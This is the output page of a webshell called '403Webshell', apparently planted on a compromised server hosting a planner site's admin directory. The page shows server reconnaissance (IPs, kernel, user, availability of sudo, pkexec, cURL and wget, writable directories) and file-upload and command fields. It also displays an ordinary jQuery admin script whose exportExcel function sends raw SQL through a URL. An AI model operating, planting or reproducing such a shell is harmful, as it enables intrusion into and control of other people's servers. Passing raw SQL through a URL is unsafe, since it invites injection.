403Webshell
Server IP : 172.67.201.108  /  Your IP : 216.73.216.11
Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/mitzvahm/planner/admin/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/mitzvahm/planner/admin/js/index.js
// JavaScript Document
$(document).ready(function() 
	{
		// do stuff when DOM is ready
		//$('#div_home').show();
		//$('#div_button_home').toggleClass('menu_item_selected');
		$('div.menu_item,.button-mini').mouseover(function() {$(this).addClass('menu_item_hover');});
		$('div.menu_item,.button-mini').mouseout(function() {$(this).removeClass('menu_item_hover');});
		//$('div.menu_item').click(function() {switchDiv($(this));});
		//$('div.menu_item_selected').unbind('click');
		//starburstToggle();
	});
	
var starburstOpacity = 1.0;
starburstToggle = function()
{
	if (starburstOpacity == 1.0)
	{
		starburstOpacity = 0.2;
		$('#arrow').fadeTo(500,starburstOpacity, function() {var t=setTimeout("starburstToggle();",200)});
	}
	else
	{
		starburstOpacity = 1.0;
		$('#arrow').fadeTo(500,starburstOpacity, function() {var t=setTimeout("starburstToggle();",3000)});
	}
}

var cur_div = 'home';
switchDiv = function(div)
	{
		divname = trim($(div).text().toLowerCase());
		divname = divname.replace(/ /gi,'_');
		//$('#div_' + cur_div).hide();
		//$('#div_' + div).show();
		$('div.menu_item').unbind('click');
		$('#div_' + divname).css("left", "785px");
		$('#div_' + divname).show();
		$('#div_button_' + divname).addClass('menu_item_selected');
		$('#div_button_' + cur_div).removeClass('menu_item_selected');
		$('#div_' + cur_div).animate({"left": "-=765px"}, 1200, 'swing', function() {$('#div_' + cur_div).hide();});
		$('#div_' + divname).delay(100).animate({"left": "-=765px"}, 1200, 'swing', function() {cur_div = divname; $('div.menu_item').click(function() {switchDiv($(this));}); $('div.menu_item_selected').unbind('click');});
	}
	
dbNavigate = function(strForm, intOffset) 
{
	document.getElementById("SearchStartRow").value = intOffset;
	document.forms[strForm].submit();
}
/*
$(function() {
	// a workaround for a flaw in the demo system (http://dev.jqueryui.com/ticket/4375), ignore!
	$('#dialog:ui-dialog').dialog('destroy');

	$('#win_form').dialog({
		autoOpen: false,
		width: 780,
		height: 550,
		modal: true,
		resizable: false
	});
});
*/

open_form = function(form_page, key_id, form_action, width, height)
{
	//$('#win_form').dialog( "option", "width", width);
	//$('#win_form').dialog( "option", "height", height);
	//$('#win_form').load('mod/' + form_page + '?KEYID=' + key_id + '&ACTION=' + form_action, function() {$('#win_form').dialog('open');});
	
	//$('#div_db_form').load('mod/' + form_page + '?KEYID=' + key_id + '&ACTION=' + form_action, function() {});
	url = 'mod/' + form_page + '?KEYID=' + key_id + '&ACTION=' + form_action;
	//url = 'mod/test.php';
	//url = 'http://www.latcomsystems.com';
	//alert($('#div_db_grid').css('height'));
	$('#div_db_grid').css('height','120px');
	$('#div_db_form').css('height','430px');
	window.frames['iframe_form'].location = url;
}

exportExcel = function(xls_sql)
{
	//alert('This functionality is currently under development.');
	rptWindowName = this.open("mod/_export_excel.php?sql=" + xls_sql, "rptWindowName", "scrollbars=yes, resizable=yes, location=no, toolbar=no, menubar=no");
	rptWindowName.focus();
}

setCookie = function(c_name,value,expiredays) {
var exdate=new Date();
exdate.setDate(exdate.getDate()+expiredays);
document.cookie=c_name+ "=" +escape(value) + ((expiredays==null) ? "" : ";expires="+exdate.toGMTString());
}

getCookie = function(c_name) {
if (document.cookie.length>0)
  {
  c_start=document.cookie.indexOf(c_name + "=");
  if (c_start!=-1)
    { 
    c_start=c_start + c_name.length+1; 
    c_end=document.cookie.indexOf(";",c_start);
    if (c_end==-1) c_end=document.cookie.length;
    return unescape(document.cookie.substring(c_start,c_end));
    } 
  }
return "";
}

confirmDelete = function(msg, page)
{
	var answer = confirm(msg);
	if (answer == true){
		window.location.href = 'index.php?IX=' + page;
	}
}


Youez - 2016 - github.com/yon3zu
LinuXploit